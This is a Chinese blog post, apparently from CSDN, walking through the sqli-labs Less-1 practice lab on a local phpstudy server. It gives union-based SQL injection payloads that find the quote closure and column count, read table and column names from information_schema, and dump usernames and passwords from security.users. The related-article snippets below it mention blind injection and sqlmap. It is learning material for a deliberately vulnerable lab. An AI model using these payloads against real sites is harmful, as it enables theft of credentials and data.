sql注入(sqli/less-1)

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量102 收藏
点赞数
分类专栏: # sql注入漏洞 文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eggplant_lala/article/details/129030360
版权
本文通过phpstudy搭建环境,演示了SQL注入攻击的过程,包括利用敏感字符测试闭合、判断列数、查询数据库和表名以及获取数据。文章详细阐述了如何通过注入构造查询来获取信息。
摘要由CSDN通过智能技术生成

环境;phpstudy搭建就可以

把sqli文件放在www下

使用敏感字符,判断闭合字符

有明显的报错信息

And 1=1 %23 // 恒为真是可以的%23是# 是注释后边干扰

这是恒假的 //页面错误

通过这个可以判断单引号就是闭合字符

判断列数为三列使用order by

判断显示位,已经知道有三个字段,现在判断那些是显示,那我们就填充三个数字

union select 1,2,3 %23

发现正常显示那就说明,正确就会选择输出之前规定,,现在需要让它显示错误

?id=1’ and 1=2 select 1,2,3 %23

这里可以直接id的值等于-1就判断恒为假

发现显示位置

查看当前数据库

?id=1'%20and%201=2%20union%20select%201,2,database()%20%23

现在我们要查当前数据库里的表

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +

//意思是从默认数据库information_schema中tables表中查看表所属数据库名为security的所有表名

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- +

//查看users 列名

http://127.0.0.1/sqli/Less-1/?id=1' and1=2 union select1,2,group_concat(id,0x23,username,0x23,password) from security.users -- +

//查看其中全部三列数据用#隔开

eggplant_lala
关注
专栏目录
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20,sqli-labs less20
Sql注入-Less-1
dahege666的博客
04-02 421
一、环境搭建 apache+mysql+php Tomcat+mysql+java(部分关卡需要) 如果可以的话,推荐在 windows 和 linux 下分别安装: Windows 下可以用 wamp、phpstudy、apmserv 等直接安装,linux 下可在网上搜索教程进行 安装。我 的测 试 环 境 是 windows 下 用 phpstudy 直 接 搭 建 的. sqli-l...
sql-labs SQL注入平台-第1关Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
Onlyone_1314的博客
07-25 1425
记得把php.in中的转义参数magic_quotes_gpc配置成Off不然发送的请求参数中的符号会被加上\转义,从而无法直接拼接到SQL语句中去。
sql注入CTF less-1
qq_53851730的博客
04-14 262
请输入ID作为带数值的参数 我们先输入一个id=2,有显示,然后我们现在判断一下是字符值类型还是数值类型的(注:字符类型和数值类型的攻击方式不一样) 判断方法为在id=2后面加’ 加入后说明这个是字符类型的SQL注入,接下来就好办了 使用order by查看有多少字段,但是我们发现代码竟然报错了 翻译:您的SQL语法有错误;请查看与MySQL服务器版本对应的手册,以了解在第1行使用接近极限0,1'的正确语法 这个说明是sql语句是问题然后我们看一下我们输入的sql语句实际...
sqli-labs less-1
zbbjya的博客
02-08 459
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
第十二天,sql注入
san3144393495的博客
04-20 272
第十二天,sql注入sql注入是非常复杂的,它呢是要去区别数据库类型和提交方法,数据类型注入,这类漏洞在web安全是比较重要的漏洞,要学会利用,挖掘,修复。下面是给sql注入的思维导图 这些知识点,有的就比较简单,有的就比较困难,右边四块是相对于比较容易理解的四块,左边四块就困难一些,今天先学习右边的这些,把左边的弄明白 今天先打mysql数据库,还可能今天讲不完emmm, sql注入安全测试中的危害,这个危害主要分为两块,大部分的sql注入但是对数据库里面的数据进行操作,或者是更新或
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5502
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 595
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
sqli-labs Less-1~4(sqli-labs闯关指南 1—4)
m0_54899775的博客
12-14 1199
sqli-labs Less-1 sqli-labs Less-2 sqli-labs Less-3 sqli-labs Less-4 sqli-labs Less-1~4(sqli-labs闯关指南 1—4) sqlilab注入天书1-4 sql注入
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 710
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
SQL注入
CDLittleBoy的博客
05-07 2279
1、SQL注入最简单的原理代码 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; ​ 注入点在于’id′,id',id′,id为接收传参的变量,基本思路是在传参中闭合前面的单引号,注释掉后面的单引号。 2、查找注入点的办法 ?id=1' #添加单引号就行传参闭合 ?id=1' [or/and] '1=2 #使用逻辑与或者逻辑或,判断where注入条件 3、常用注释符号 # --+ #URL解码后,“+”被解码为“
SQL注入sqli-labs(less1-7)
冷冷的oO
04-24 3660
注:靶场基本上每一关的目标都是拿到数据库的用户名和密码。 Less-1 打开第一关看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
SQL注入sqli-labs】Less 1 - Less 5 练习笔记
全栈纸伞
07-09 1043
SQL注入sqli-labs】Less 1 - Less 5 练习笔记0x00 部署sqli-labs这部分相信大部分人都会了,我简单推荐一种简单的组合 wamp 实现一键部署,其中包含PHP环境 navicat 导入数据 这里悄悄的给出一种作弊的方法,就是在每句SQL语句后面:echo $sql. '<br>';如果是练习盲注的同学还是老老实实按照不作弊的方式来。0x01 开始练习L
网络安全sql注入-less1
koala_king的博客
08-17 1399
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
SQL注入sqlilabs:less-1
Dmajorcanon的博客
02-21 3757
sqlilabs个人练习及解题思路√
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2430
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 2000
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 726
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 921
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值